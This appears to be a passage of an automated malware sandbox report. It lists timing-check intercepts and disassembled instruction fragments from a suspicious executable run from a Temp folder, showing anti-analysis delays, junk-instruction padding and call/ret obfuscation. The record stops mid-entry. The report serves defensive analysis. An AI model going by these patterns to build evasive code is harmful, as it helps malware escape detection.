Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACBD second address: 45ACC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45B1BE second address: 45B1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F742CC44212h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45B1D9 second address: 45B1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41BF25 second address: 41BF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463FAB second address: 463FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463FB0 second address: 463FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464101 second address: 464114 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464114 second address: 46411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4628BA second address: 4628C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463030 second address: 463034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463034 second address: 46303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46431F second address: 464325 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464325 second address: 46432F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46432F second address: 46433D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46433D second address: 464347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466CC4 second address: 466CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F742CC44208h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F742CC44210h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466CE8 second address: 466D23 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F742CEB81C6h 0x00000008 jnl 00007F742CEB81C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F742CEB81D2h 0x00000017 jmp 00007F742CEB81D7h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466EA1 second address: 466ED1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F742CC44206h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F742CC4420Dh 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F742CC4420Bh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466ED1 second address: 466ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466ED5 second address: 466EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466EDB second address: 466EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F742CEB81C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467042 second address: 467051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F742CC44206h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467051 second address: 46706F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46706F second address: 467075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467075 second address: 46707B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4675AB second address: 4675DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC44216h 0x00000010 jmp 00007F742CC4420Fh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4675DB second address: 4675DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46AAEC second address: 46AAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46B8AD second address: 46B903 instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81CCh 0x00000008 jno 00007F742CEB81C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F742CEB81C8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+122D1B4Eh] 0x00000031 nop 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F742CEB81D8h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46B903 second address: 46B907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BD1A second address: 46BD1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE02 second address: 46BE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44214h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE6A second address: 46BE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE6E second address: 46BE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE72 second address: 46BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE78 second address: 46BE8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jno 00007F742CC44206h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C394 second address: 46C39E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C39E second address: 46C3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C3A8 second address: 46C3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jns 00007F742CEB81C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46CBC7 second address: 46CBE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44213h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46CBE5 second address: 46CC00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E899 second address: 46E89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E89D second address: 46E8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E8A3 second address: 46E8A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E8A8 second address: 46E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F742CEB81C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jnc 00007F742CEB81D8h 0x0000002a mov dword ptr [ebp+12473A54h], eax 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 sub edi, dword ptr [ebp+122D31C6h] 0x00000039 pop esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F742CEB81C8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 and di, FCC4h 0x0000005b and esi, 54AB21E2h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E92D second address: 46E934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 470844 second address: 47086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F742CEB81CCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47086F second address: 470875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 470875 second address: 4708FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, di 0x0000000c push 00000000h 0x0000000e pushad 0x0000000f jno 00007F742CEB81CCh 0x00000015 mov edi, edx 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F742CEB81D0h 0x0000001e js 00007F742CEB81C9h 0x00000024 movzx eax, si 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F742CEB81C8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 jg 00007F742CEB81D4h 0x0000004a mov dword ptr [ebp+122D3385h], edi 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 jmp 00007F742CEB81CEh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46FC25 second address: 46FC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46FC29 second address: 46FC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47261A second address: 47261E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47261E second address: 472622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 473B4E second address: 473B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 473B58 second address: 473BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D17BDh], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F742CEB81C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub di, 7DB7h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F742CEB81C8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push ebx 0x0000004f jp 00007F742CEB81C6h 0x00000055 pop ebx 0x00000056 pop eax 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 477AAB second address: 477AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F742CC44206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 478B13 second address: 478B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D7h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c je 00007F742CEB81CCh 0x00000012 mov dword ptr [ebp+122D34FEh], edi 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b mov cx, bx 0x0000001e mov dword ptr [ebp+122D17F3h], ecx 0x00000024 popad 0x00000025 mov dword ptr [ebp+122D1BE8h], eax 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F742CEB81C8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 clc 0x00000048 mov dword ptr [ebp+122D1BCAh], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 pop ebx 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ABF0 second address: 47AC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC4420Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AC02 second address: 47AC07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BBE1 second address: 47BC69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F742CC44206h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F742CC44208h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2F43h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 mov edi, dword ptr [ebp+122DB6A1h] 0x00000038 pop edi 0x00000039 xor dword ptr [ebp+12478177h], eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F742CC44208h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov ebx, 7E67FAABh 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F742CC44218h 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BC69 second address: 47BC7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F742CEB81C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 475B72 second address: 475B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BC7B second address: 47BC88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 477C9D second address: 477CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ED49 second address: 47ED4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ED4E second address: 47ED54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AD2A second address: 47AD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD7E second address: 47CD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47DEDE second address: 47DEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AD2F second address: 47AD58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F742CC44218h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007F742CC44224h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD82 second address: 47CD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47EF2B second address: 47EF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD8C second address: 47CD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47FC94 second address: 47FC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47EF2F second address: 47EF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD90 second address: 47CE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2C98h], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 and edi, dword ptr [ebp+124509C2h] 0x0000001d pushad 0x0000001e mov edx, dword ptr [ebp+122D2C98h] 0x00000024 mov edi, 31B07745h 0x00000029 popad 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 sub dword ptr [ebp+122D17DDh], edi 0x00000037 mov eax, dword ptr [ebp+122D07A1h] 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F742CC44208h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov edi, ebx 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007F742CC44208h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 0000001Dh 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 jmp 00007F742CC44216h 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 